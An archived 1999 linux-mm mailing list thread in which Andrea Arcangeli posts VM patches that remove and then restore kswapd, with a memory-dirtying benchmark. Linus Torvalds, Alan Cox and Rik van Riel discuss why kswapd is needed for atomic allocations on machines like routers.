- * The wait queue for waking up the pageout daemon:
- */
-static struct task_struct * kswapd_task = NULL;
-
-static void init_swap_timer(void);
-
 /*
  * The swap-out functions return 1 if they successfully
  * threw something out, and we got a free page. It returns
@@ -163,7 +162,7 @@
 			 * cache. */
 			if (PageSwapCache(page_map)) {
 				__free_page(page_map);
-				return (atomic_read(&page_map->count) == 0);
+				return 1;
 			}
 			add_to_swap_cache(page_map, entry);
 			/* We checked we were unlocked way up above, and we
@@ -195,7 +194,7 @@
 		flush_tlb_page(vma, address);
 		swap_duplicate(entry);
 		__free_page(page_map);
-		return (atomic_read(&page_map->count) == 0);
+		return 1;
 	} 
 	/* 
 	 * A clean page to be discarded?  Must be mmap()ed from
@@ -210,9 +209,8 @@
 	flush_cache_page(vma, address);
 	pte_clear(page_table);
 	flush_tlb_page(vma, address);
-	entry = (atomic_read(&page_map->count) == 1);
 	__free_page(page_map);
-	return entry;
+	return 1;
 }
 
 /*
@@ -230,7 +228,7 @@
  */
 
 static inline int swap_out_pmd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pte_t * pte;
 	unsigned long pmd_end;
@@ -251,18 +249,20 @@
 
 	do {
 		int result;
-		tsk->swap_address = address + PAGE_SIZE;
 		result = try_to_swap_out(tsk, vma, address, pte, gfp_mask);
+		address += PAGE_SIZE;
+		tsk->swap_address = address;
 		if (result)
 			return result;
-		address += PAGE_SIZE;
+		if (!--*counter)
+			return 0;
 		pte++;
 	} while (address < end);
 	return 0;
 }
 
 static inline int swap_out_pgd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pmd_t * pmd;
 	unsigned long pgd_end;
@@ -282,9 +282,11 @@
 		end = pgd_end;
 	
 	do {
-		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask);
+		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PMD_SIZE) & PMD_MASK;
 		pmd++;
 	} while (address < end);
@@ -292,7 +294,7 @@
 }
 
 static int swap_out_vma(struct task_struct * tsk, struct vm_area_struct * vma,
-	unsigned long address, int gfp_mask)
+	unsigned long address, int gfp_mask, unsigned long * counter)
 {
 	pgd_t *pgdir;
 	unsigned long end;
@@ -306,16 +308,19 @@
 
 	end = vma->vm_end;
 	while (address < end) {
-		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask);
+		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PGDIR_SIZE) & PGDIR_MASK;
 		pgdir++;
 	}
 	return 0;
 }
 
-static int swap_out_process(struct task_struct * p, int gfp_mask)
+static int swap_out_process(struct task_struct * p, int gfp_mask,
+			    unsigned long * counter)
 {
 	unsigned long address;
 	struct vm_area_struct* vma;
@@ -334,9 +339,12 @@
 			address = vma->vm_start;
 
 		for (;;) {
-			int result = swap_out_vma(p, vma, address, gfp_mask);
+			int result = swap_out_vma(p, vma, address, gfp_mask,
+						  counter);
 			if (result)
 				return result;
+			if (!*counter)
+				return 0;
 			vma = vma->vm_next;
 			if (!vma)
 				break;
@@ -350,6 +358,25 @@
 	return 0;
 }
 
+static inline unsigned long calc_swapout_weight(int priority)
+{
+	struct task_struct * p;
+	unsigned long total_vm = 0;
+
+	read_lock(&tasklist_lock);
+	for_each_task(p)
+	{
+		if (!p->swappable)
+			continue;
+		if (p->mm->rss == 0)
+			continue;
+		total_vm += p->mm->total_vm;
+	}
+	read_unlock(&tasklist_lock);
+
+	return total_vm / (priority+1);
+}
+
 /*
  * Select the task with maximal swap_cnt and try to swap out a page.
  * N.B. This function returns only 0 or 1.  Return values != 1 from
@@ -358,8 +385,11 @@
 static int swap_out(unsigned int priority, int gfp_mask)
 {
 	struct task_struct * p, * pbest;
-	int counter, assign, max_cnt;
+	int assign;
+	unsigned long counter, max_cnt;
 
+	counter = calc_swapout_weight(priority);
+
 	/* 
 	 * We make one or two passes through the task list, indexed by 
 	 * assign = {0, 1}:
@@ -374,23 +404,17 @@
 	 * Think of swap_cnt as a "shadow rss" - it tells us which process
 	 * we want to page out (always try largest first).
 	 */
-	counter = nr_tasks / (priority+1);
-	if (counter < 1)
-		counter = 1;
-	if (counter > nr_tasks)
-		counter = nr_tasks;
-
-	for (; counter >= 0; counter--) {
+	while (counter != 0) {
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
 	select:
 		read_lock(&tasklist_lock);
-		p = init_task.next_task;
-		for (; p != &init_task; p = p->next_task) {
+		for_each_task(p)
+		{
 			if (!p->swappable)
 				continue;
-	 		if (p->mm->rss <= 0)
+	 		if (p->mm->rss == 0)
 				continue;
 			/* Refresh swap_cnt? */
 			if (assign)
@@ -410,127 +434,51 @@
 		}
 
 		/*
-		 * Nonzero means we cleared out something, but only "1" means
-		 * that we actually free'd up a page as a result.
+		 * Nonzero means we cleared out something, and "1" means
+		 * that we actually moved a page from the process memory
+		 * to the swap cache (it's not been freed yet).
 		 */
-		if (swap_out_process(pbest, gfp_mask) == 1)
+		if (swap_out_process(pbest, gfp_mask, &counter))
 			return 1;
 	}
 out:
 	return 0;
 }
 
-/*
- * Before we start the kernel thread, print out the 
- * kswapd initialization message (otherwise the init message 
- * may be printed in the middle of another driver's init 
- * message).  It looks very bad when that happens.
- */
-void __init kswapd_setup(void)
+static int do_free_user_and_cache(int priority, int gfp_mask)
 {
-       int i;
-       char *revision="$Revision: 1.5 $", *s, *e;
+	if (shrink_mmap(priority, gfp_mask))
+		return 1;
 
-       swap_setup();
-       
-       if ((s = strchr(revision, ':')) &&
-           (e = strchr(s, '$')))
-               s++, i = e - s;
-       else
-               s = revision, i = -1;
-       printk ("Starting kswapd v%.*s\n", i, s);
-}
-
-#define free_memory(fn) \
-	count++; do { if (!--count) goto done; } while (fn)
-
-static int kswapd_free_pages(int kswapd_state)
-{
-	unsigned long end_time;
-
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(0);
-
-	/* max one hundreth of a second */
-	end_time = jiffies + (HZ-1)/100;
-	do {
-		int priority = 8;
-		int count = pager_daemon.swap_cluster;
+	if (swap_out(priority, gfp_mask & ~__GFP_WAIT))
+		/*
+		 * We done at least some swapping progress so return 1 in
+		 * this case. -arca
+		 */
+		return 1;
 
-		switch (kswapd_state) {
-			do {
-			default:
-				free_memory(shrink_mmap(priority, 0));
-				free_memory(swap_out(priority, 0));
-				kswapd_state++;
-			case 1:
-				free_memory(shm_swap(priority, 0));
-				shrink_dcache_memory(priority, 0);
-				kswapd_state = 0;
-			} while (--priority >= 0);
-			return kswapd_state;
-		}
-done:
-		if (nr_free_pages > freepages.high + pager_daemon.swap_cluster)
-			break;
-	} while (time_before_eq(jiffies,end_time));
-	return kswapd_state;
+	return 0;
 }
 
-/*
- * The background pageout daemon.
- * Started as a kernel thread from the init process.
- */
-int kswapd(void *unused)
+static int do_free_page(int * state, int gfp_mask)
 {
-	current->session = 1;
-	current->pgrp = 1;
-	strcpy(current->comm, "kswapd");
-	sigfillset(&current->blocked);
-	
-	/*
-	 *	As a kernel thread we want to tamper with system buffers
-	 *	and other internals and thus be subject to the SMP locking
-	 *	rules. (On a uniprocessor box this does nothing).
-	 */
-	lock_kernel();
+	int priority = 6;
 
-	/*
-	 * Set the base priority to something smaller than a
-	 * regular process. We will scale up the priority
-	 * dynamically depending on how much memory we need.
-	 */
-	current->priority = (DEF_PRIORITY * 2) / 3;
-
-	/*
-	 * Tell the memory management that we're a "memory allocator",
-	 * and that if we need more memory we should get access to it
-	 * regardless (see "try_to_free_pages()"). "kswapd" should
-	 * never get caught in the normal page freeing logic.
-	 *
-	 * (Kswapd normally doesn't need memory anyway, but sometimes
-	 * you need a small amount of memory in order to be able to
-	 * page out something else, and this flag essentially protects
-	 * us from recursively trying to free more memory as we're
-	 * trying to free the first piece of memory in the first place).
-	 */
-	current->flags |= PF_MEMALLOC;
+	switch (*state) {
+		do {
+		case 0:
+			if (do_free_user_and_cache(priority, gfp_mask))
+				return 1;
+			*state = 1;
+		case 1:
+			if (shm_swap(priority, gfp_mask))
+				return 1;
+			*state = 0;
 
-	init_swap_timer();
-	kswapd_task = current;
-	while (1) {
-		int state = 0;
-
-		current->state = TASK_INTERRUPTIBLE;
-		flush_signals(current);
-		run_task_queue(&tq_disk);
-		schedule();
-		swapstats.wakeups++;
-		state = kswapd_free_pages(state);
+			shrink_dcache_memory(priority, gfp_mask);
+			kmem_cache_reap(gfp_mask);
+		} while (--priority >= 0);
 	}
-	/* As if we could ever get here - maybe we want to make this killable */
-	kswapd_task = NULL;
-	unlock_kernel();
 	return 0;
 }
 
@@ -543,107 +491,26 @@
  * if we need more memory as part of a swap-out effort we
  * will just silently return "success" to tell the page
  * allocator to accept the allocation.
- *
- * We want to try to free "count" pages, and we need to 
- * cluster them so that we get good swap-out behaviour. See
- * the "free_memory()" macro for details.
  */
 int try_to_free_pages(unsigned int gfp_mask, int count)
 {
-	int retval;
-
+	int retval = 1;
 	lock_kernel();
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(gfp_mask);
-
-	retval = 1;
 	if (!(current->flags & PF_MEMALLOC)) {
-		int priority;
-
 		current->flags |= PF_MEMALLOC;
-	
-		priority = 8;
-		do {
-			free_memory(shrink_mmap(priority, gfp_mask));
-			free_memory(shm_swap(priority, gfp_mask));
-			free_memory(swap_out(priority, gfp_mask));
-			shrink_dcache_memory(priority, gfp_mask);
-		} while (--priority >= 0);
-		retval = 0;
-done:
+		while (count--)
+		{
+			static int state = 0;
+			if (!do_free_page(&state, gfp_mask))
+			{
+				retval = 0;
+				break;
+			}
+		}
 		current->flags &= ~PF_MEMALLOC;
 	}
 	unlock_kernel();
 
 	return retval;
-}
-
-/*
- * Wake up kswapd according to the priority
- *	0 - no wakeup
- *	1 - wake up as a low-priority process
- *	2 - wake up as a normal process
- *	3 - wake up as an almost real-time process
- *
- * This plays mind-games with the "goodness()"
- * function in kernel/sched.c.
- */
-static inline void kswapd_wakeup(struct task_struct *p, int priority)
-{
-	if (priority) {
-		p->counter = p->priority << priority;
-		wake_up_process(p);
-	}
-}
-
-/* 
- * The swap_tick function gets called on every clock tick.
- */
-void swap_tick(void)
-{
-	struct task_struct *p = kswapd_task;
-
-	/*
-	 * Only bother to try to wake kswapd up
-	 * if the task exists and can be woken.
-	 */
-	if (p && (p->state & TASK_INTERRUPTIBLE)) {
-		unsigned int pages;
-		int want_wakeup;
-
-		/*
-		 * Schedule for wakeup if there isn't lots
-		 * of free memory or if there is too much
-		 * of it used for buffers or pgcache.
-		 *
-		 * "want_wakeup" is our priority: 0 means
-		 * not to wake anything up, while 3 means
-		 * that we'd better give kswapd a realtime
-		 * priority.
-		 */
-		want_wakeup = 0;
-		pages = nr_free_pages;
-		if (pages < freepages.high)
-			want_wakeup = 1;
-		if (pages < freepages.low)
-			want_wakeup = 2;
-		if (pages < freepages.min)
-			want_wakeup = 3;
-	
-		kswapd_wakeup(p,want_wakeup);
-	}
-
-	timer_active |= (1<<SWAP_TIMER);
-}
-
-/* 
- * Initialise the swap timer
- */
-
-void init_swap_timer(void)
-{
-	timer_table[SWAP_TIMER].expires = jiffies;
-	timer_table[SWAP_TIMER].fn = swap_tick;
-	timer_active |= (1<<SWAP_TIMER);
 }
Index: linux/mm/page_alloc.c
diff -u linux/mm/page_alloc.c:1.1.1.5 linux/mm/page_alloc.c:1.1.1.1.2.14
--- linux/mm/page_alloc.c:1.1.1.5	Sun Jan  3 20:42:44 1999
+++ linux/mm/page_alloc.c	Mon Jan  4 18:42:54 1999
@@ -260,7 +260,8 @@
 		if (nr_free_pages > freepages.min) {
 			if (!current->trashing_memory)
 				goto ok_to_allocate;
-			if (nr_free_pages > freepages.low) {
+			if (!(current->flags & PF_MEMALLOC) &&
+			    nr_free_pages > freepages.low) {
 				current->trashing_memory = 0;
 				goto ok_to_allocate;
 			}
@@ -271,7 +272,7 @@
 		 * memory.
 		 */
 		current->trashing_memory = 1;
-		if (!try_to_free_pages(gfp_mask, SWAP_CLUSTER_MAX) && !(gfp_mask & (__GFP_MED | __GFP_HIGH)))
+		if (!try_to_free_pages(gfp_mask, freepages.high - nr_free_pages + 1<<order) && !(gfp_mask & (__GFP_MED | __GFP_HIGH)))
 			goto nopage;
 	}
 ok_to_allocate:
Index: linux/init/main.c
diff -u linux/init/main.c:1.1.1.5 linux/init/main.c:1.1.1.1.2.9
--- linux/init/main.c:1.1.1.5	Tue Dec 29 01:39:16 1998
+++ linux/init/main.c	Mon Jan  4 18:42:54 1999
@@ -63,8 +63,6 @@
 
 static int init(void *);
 extern int bdflush(void *);
-extern int kswapd(void *);
-extern void kswapd_setup(void);
 
 extern void init_IRQ(void);
 extern void init_modules(void);
@@ -1269,9 +1267,6 @@
 
 	/* Launch bdflush from here, instead of the old syscall way. */
 	kernel_thread(bdflush, NULL, CLONE_FS | CLONE_FILES | CLONE_SIGHAND);
-	/* Start the background pageout daemon. */
-	kswapd_setup();
-	kernel_thread(kswapd, NULL, CLONE_FS | CLONE_FILES | CLONE_SIGHAND);
 
 #if CONFIG_AP1000
 	/* Start the async paging daemon. */
Index: linux/include/linux/mm.h
diff -u linux/include/linux/mm.h:1.1.1.3 linux/include/linux/mm.h:1.1.1.1.2.13
--- linux/include/linux/mm.h:1.1.1.3	Sat Jan  2 15:24:18 1999
+++ linux/include/linux/mm.h	Mon Jan  4 18:42:52 1999
@@ -118,7 +118,6 @@
 	unsigned long offset;
 	struct page *next_hash;
 	atomic_t count;
-	unsigned int unused;
 	unsigned long flags;	/* atomic flags, some possibly updated asynchronously */
 	struct wait_queue *wait;
 	struct page **pprev_hash;
@@ -295,8 +294,7 @@
 
 /* filemap.c */
 extern void remove_inode_page(struct page *);
-extern unsigned long page_unuse(struct page *);
-extern int shrink_mmap(int, int);
+extern int FASTCALL(shrink_mmap(int, int));
 extern void truncate_inode_pages(struct inode *, unsigned long);
 extern unsigned long get_cached_page(struct inode *, unsigned long, int);
 extern void put_cached_page(unsigned long);
Index: linux/mm/swap.c
diff -u linux/mm/swap.c:1.1.1.5 linux/mm/swap.c:1.1.1.1.2.8
--- linux/mm/swap.c:1.1.1.5	Sat Jan  2 15:24:40 1999
+++ linux/mm/swap.c	Sat Jan  2 21:40:13 1999
@@ -64,13 +64,13 @@
 swapstat_t swapstats = {0};
 
 buffer_mem_t buffer_mem = {
-	2,	/* minimum percent buffer */
+	5,	/* minimum percent buffer */
 	10,	/* borrow percent buffer */
 	60	/* maximum percent buffer */
 };
 
 buffer_mem_t page_cache = {
-	2,	/* minimum percent page cache */
+	5,	/* minimum percent page cache */
 	15,	/* borrow percent page cache */
 	75	/* maximum */
 };
Index: linux/include/linux/swap.h
diff -u linux/include/linux/swap.h:1.1.1.4 linux/include/linux/swap.h:1.1.1.1.2.9
--- linux/include/linux/swap.h:1.1.1.4	Tue Dec 29 01:39:03 1998
+++ linux/include/linux/swap.h	Tue Dec 29 02:19:08 1998
@@ -167,9 +167,11 @@
 	count = atomic_read(&page->count);
 	if (PageSwapCache(page))
 	{
+#if 0
 		/* PARANOID */
 		if (page->inode != &swapper_inode)
 			panic("swap cache page has wrong inode\n");
+#endif
 		count += swap_count(page->offset) - 2;
 	}
 	if (PageFreeAfter(page))


--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 28%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-04 18:08 28%                   ` [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]] Andrea Arcangeli
@ 1999-01-04 20:56 62%                     ` Linus Torvalds
  1999-01-04 21:10 64%                       ` Rik van Riel
                                         ` (2 more replies)
  0 siblings, 3 replies; 200+ results
From: Linus Torvalds @ 1999-01-04 20:56 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: Steve Bergman, Benjamin Redelings I, Stephen C. Tweedie,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm



On Mon, 4 Jan 1999, Andrea Arcangeli wrote:
>
> I have a new revolutionary patch. The main thing is that I killed kswapd
> just to make Rik happy ;).

Ehh..

You may have made Rik happy, but you totally missed the reason for kswapd. 
And while your patch looked interesting (a lot cleaner than the previous
ones, and I _like_ patches that remove code), the fact that you killed
kswapd means that it is essentially useless. 

Basically, we _have_ to have kswapd, and I'll tell you why:
 - imagine running low on memory due to GFP_ATOMIC
 - imagine not having any normal processes that do memory alloction.

Boom. You just killed the machine with your patch, because maybe the
GPF_ATOMIC things are what the machine is doing. Imagine a machine that
acts as a router - it might not even be running any normal user processes
at _all_, but it had damn well better make sure that memory is always
available some way. "kswapd" did that for us, and Rik's happiness counts
as nothing in face of basic facts of life like that. Sorry.

		Linus

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 62%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-04 20:56 62%                     ` Linus Torvalds
  1999-01-04 21:10 64%                       ` Rik van Riel
@ 1999-01-04 22:04 64%                       ` Alan Cox
  1999-01-04 21:55 64%                         ` Linus Torvalds
  1999-01-04 22:43 56%                         ` [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]] Andrea Arcangeli
  1999-01-04 22:29 64%                       ` Andrea Arcangeli
  2 siblings, 2 replies; 200+ results
From: Alan Cox @ 1999-01-04 22:04 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: andrea, steve, bredelin, sct, linux-kernel, alan, H.H.vanRiel,
	linux-mm

> Boom. You just killed the machine with your patch, because maybe the
> GPF_ATOMIC things are what the machine is doing. Imagine a machine that
> acts as a router - it might not even be running any normal user processes
> at _all_, but it had damn well better make sure that memory is always
> available some way. "kswapd" did that for us, and Rik's happiness counts
> as nothing in face of basic facts of life like that. Sorry.

Its performance properties are very interesting however. They do seem to suggest
kswapd should be more of a last resort. 

Alan


--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-04 22:04 64%                       ` Alan Cox
@ 1999-01-04 21:55 64%                         ` Linus Torvalds
  1999-01-04 22:51 64%                           ` Andrea Arcangeli
  1999-01-04 22:43 56%                         ` [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]] Andrea Arcangeli
  1 sibling, 1 reply; 200+ results
From: Linus Torvalds @ 1999-01-04 21:55 UTC (permalink / raw)
  To: Alan Cox
  Cc: andrea, steve, bredelin, sct, linux-kernel, H.H.vanRiel, linux-mm



On Mon, 4 Jan 1999, Alan Cox wrote:
> > Boom. You just killed the machine with your patch, because maybe the
> > GPF_ATOMIC things are what the machine is doing. Imagine a machine that
> > acts as a router - it might not even be running any normal user processes
> > at _all_, but it had damn well better make sure that memory is always
> > available some way. "kswapd" did that for us, and Rik's happiness counts
> > as nothing in face of basic facts of life like that. Sorry.
> 
> Its performance properties are very interesting however. They do seem to suggest
> kswapd should be more of a last resort. 

Agreed, I found that interesting too. The solution may just be to make
kswapd run a lot less often rather than removing it - for the
machine-killing out-of-memory situation it doesn't matter if kswapd runs
just a few times a second or something like that. 

However, one of the things I found so appealing with the patch was the
fact that it removed a lot of code, and that wouldn't be true for
something that just changed kswapd to run less often. Oh, well. 

		Linus

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-04 20:56 62%                     ` Linus Torvalds
  1999-01-04 21:10 64%                       ` Rik van Riel
  1999-01-04 22:04 64%                       ` Alan Cox
@ 1999-01-04 22:29 64%                       ` Andrea Arcangeli
  2 siblings, 0 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-04 22:29 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Steve Bergman, Benjamin Redelings I, Stephen C. Tweedie,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm

On Mon, 4 Jan 1999, Linus Torvalds wrote:

> GPF_ATOMIC things are what the machine is doing. Imagine a machine that
> acts as a router - it might not even be running any normal user processes

Argg, I didn't thought at that, now I understood the point... But I am
pretty sure we can continue to do async swapout also from the process
path. I think it works fine because now swapout is only a bank credit. It
works faster obviously because the process doesn't need to block and so
requesting many swapout at one time will drammatically improve swapout
I/O performances... 

I am going to re-insert the poor kswapd now ;)

Thanks.

Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-04 21:55 64%                         ` Linus Torvalds
@ 1999-01-04 22:51 64%                           ` Andrea Arcangeli
  1999-01-05  0:32 30%                             ` Andrea Arcangeli
  0 siblings, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-04 22:51 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Alan Cox, steve, bredelin, sct, linux-kernel, H.H.vanRiel,
	linux-mm

On Mon, 4 Jan 1999, Linus Torvalds wrote:

> However, one of the things I found so appealing with the patch was the
> fact that it removed a lot of code, and that wouldn't be true for
> something that just changed kswapd to run less often. Oh, well. 

We can still remove the dynamic prio thing and the
run-one-jiffy-and-schedule thing since we don't need to give
swapout performances via kswapd anymore allowing the process to swapout
async and take credits from the bank some time after...

We can more simply schedule() if need_resched is set inside the kswapd
engine.

I am going to do something like that right now...

Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-04 22:04 64%                       ` Alan Cox
  1999-01-04 21:55 64%                         ` Linus Torvalds
@ 1999-01-04 22:43 56%                         ` Andrea Arcangeli
  1 sibling, 0 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-04 22:43 UTC (permalink / raw)
  To: Alan Cox
  Cc: Linus Torvalds, steve, bredelin, sct, linux-kernel, H.H.vanRiel,
	linux-mm

On Mon, 4 Jan 1999, Alan Cox wrote:

> Its performance properties are very interesting however. They do seem to suggest
> kswapd should be more of a last resort. 

Steve said me now that the image test runs not fast as in arca-3 (the one
before inserting my new swap_out() smart weight code), but here there are
no dubits. My latest patch double performances under swap here and every
thing is _far_ more fluid (I tried only on 128Mbyte of RAM though). I go
to the cinema in the menatime and I tried again now with the same
results... 

Just to allow everyone to see the difference (and to tell me if eventually
I am missing something of magic ;) here is the bench I am using:

#include <stdio.h>
#include <time.h>

main()
{
	char *p[160];
	int i, j;
	int count;
	time_t start,stop;
	for (j=0; j<160; j++)
	{
		p[j] = (char *) malloc(1000000);
	}
	for (count=0;count<2000;count++)
	{
		start = time(NULL);
		for (j=0; j<160; j++)
		{
			for (i=0; i<1000000; i++)
				p[j][i] = 0;
		}
		stop = time(NULL);
		if (count)
			printf("elapsed %u\n", stop-start);
		fflush(stdout);
	}
}

The number 160 menas that the benchmark will tell you the time in sec it
takes to dirtify 160 mbyte of virtual memory in loop. It now runs in 54
sec (against 100 before) and I am writing this in the meantime without see
differences with an idle system (I couldn't open pine and sort some huge
folder without any kind of slowdown under the same conditions before). My
I/O is _slowww__ I have _everything_ in a IDE 6mbyte/sec disk and the seek
time is really a pain (note it's the HD that is slowww, I like IDE ;). 

I am going to revert everything except the new things that caused the
benchmark to double performances and the system to go far more fluid, to
arca-vm-3 (that it's reported to be the fastest vm out there by steve
under misc swapping usage (the image test)). I probably leave the
swap_out() smart weight code since it's really needed on low memory even
if it seems that the swapout weight is causing a bit of slowdown probably
because it's not tuned right now.

Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 56%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-04 20:56 62%                     ` Linus Torvalds
@ 1999-01-04 21:10 64%                       ` Rik van Riel
  1999-01-04 22:04 64%                       ` Alan Cox
  1999-01-04 22:29 64%                       ` Andrea Arcangeli
  2 siblings, 0 replies; 200+ results
From: Rik van Riel @ 1999-01-04 21:10 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Andrea Arcangeli, Steve Bergman, Benjamin Redelings I,
	Stephen C. Tweedie, linux-kernel, Alan Cox, linux-mm

On Mon, 4 Jan 1999, Linus Torvalds wrote:
> On Mon, 4 Jan 1999, Andrea Arcangeli wrote:
> >
> > I have a new revolutionary patch. The main thing is that I killed kswapd
> > just to make Rik happy ;).
> 
> You may have made Rik happy,

Not even that -- I really like the concept of a separate
thread doing the much needed page freeing...

> but you totally missed the reason for kswapd.  And while your
> patch looked interesting (a lot cleaner than the previous ones,
> and I _like_ patches that remove code), the fact that you killed
> kswapd means that it is essentially useless.

Yup -- a definite No-No.
(just to make sure that nobody would have really gotten
the impression that I would be happy with the removal
of kswapd)

cheers,

Rik -- If a Microsoft product fails, who do you sue?
+-------------------------------------------------------------------+
| Linux memory management tour guide.        riel@humbolt.geo.uu.nl |
| Scouting Vries cubscout leader.    http://humbolt.geo.uu.nl/~riel |
+-------------------------------------------------------------------+

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-04 22:51 64%                           ` Andrea Arcangeli
@ 1999-01-05  0:32 30%                             ` Andrea Arcangeli
  1999-01-05  0:52 64%                               ` Zlatko Calusic
                                                 ` (2 more replies)
  0 siblings, 3 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-05  0:32 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Alan Cox, steve, bredelin, sct, linux-kernel, H.H.vanRiel,
	linux-mm

On Mon, 4 Jan 1999, Andrea Arcangeli wrote:

> I am going to do something like that right now...

Here a new patch (arca-vm-7). It pratically removes kswapd for all places
except the ATOMIC memory allocation if there aren't process that are just
freeing memory. 

It returns also to the stock/arca-vm-3 shrink_mmap() (even if it seems
slower).

Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.9 linux/mm/vmscan.c:1.1.1.1.2.64
--- linux/mm/vmscan.c:1.1.1.9	Sat Jan  2 15:46:20 1999
+++ linux/mm/vmscan.c	Tue Jan  5 01:02:43 1999
@@ -10,6 +10,14 @@
  *  Version: $Id: vmscan.c,v 1.5 1998/02/23 22:14:28 sct Exp $
  */
 
+/*
+ * Developed the balanced page freeing algorithm (do_free_user_and_cache).
+ * Developed a smart mechanism to handle the swapout weight.
+ * Allowed the process to swapout async and only then get the credit from
+ * the bank. This has doubled swapout performances and fluidness.
+ * Copyright (C) 1998  Andrea Arcangeli
+ */
+
 #include <linux/slab.h>
 #include <linux/kernel_stat.h>
 #include <linux/swap.h>
@@ -21,12 +29,15 @@
 #include <asm/pgtable.h>
 
 /* 
+ * When are we next due for a page scan? 
+ */
+static atomic_t nr_tasks_freeing_memory = ATOMIC_INIT(0);
+
+/* 
  * The wait queue for waking up the pageout daemon:
  */
 static struct task_struct * kswapd_task = NULL;
 
-static void init_swap_timer(void);
-
 /*
  * The swap-out functions return 1 if they successfully
  * threw something out, and we got a free page. It returns
@@ -163,7 +174,7 @@
 			 * cache. */
 			if (PageSwapCache(page_map)) {
 				__free_page(page_map);
-				return (atomic_read(&page_map->count) == 0);
+				return 1;
 			}
 			add_to_swap_cache(page_map, entry);
 			/* We checked we were unlocked way up above, and we
@@ -195,7 +206,7 @@
 		flush_tlb_page(vma, address);
 		swap_duplicate(entry);
 		__free_page(page_map);
-		return (atomic_read(&page_map->count) == 0);
+		return 1;
 	} 
 	/* 
 	 * A clean page to be discarded?  Must be mmap()ed from
@@ -210,9 +221,8 @@
 	flush_cache_page(vma, address);
 	pte_clear(page_table);
 	flush_tlb_page(vma, address);
-	entry = (atomic_read(&page_map->count) == 1);
 	__free_page(page_map);
-	return entry;
+	return 1;
 }
 
 /*
@@ -230,7 +240,7 @@
  */
 
 static inline int swap_out_pmd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pte_t * pte;
 	unsigned long pmd_end;
@@ -251,18 +261,20 @@
 
 	do {
 		int result;
-		tsk->swap_address = address + PAGE_SIZE;
 		result = try_to_swap_out(tsk, vma, address, pte, gfp_mask);
+		address += PAGE_SIZE;
+		tsk->swap_address = address;
 		if (result)
 			return result;
-		address += PAGE_SIZE;
+		if (!--*counter)
+			return 0;
 		pte++;
